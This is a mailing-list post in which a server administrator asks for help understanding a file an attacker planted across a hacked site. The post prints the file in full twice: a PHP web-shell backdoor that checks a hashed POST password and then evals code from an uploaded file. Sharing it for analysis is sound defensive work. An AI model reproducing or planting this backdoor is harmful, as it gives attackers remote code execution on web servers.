I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the
purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php
script because the owner is "nobody".
I can sort of figure what is doing; but, I can't figure out what the hacker is using it for.
Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any
code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files.
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
echo "$t\n";
} ;
function testdata($t)
{
say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"]))
{
eval($code);
}
else
{
testdata('f');
} ;
}
else
{
testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
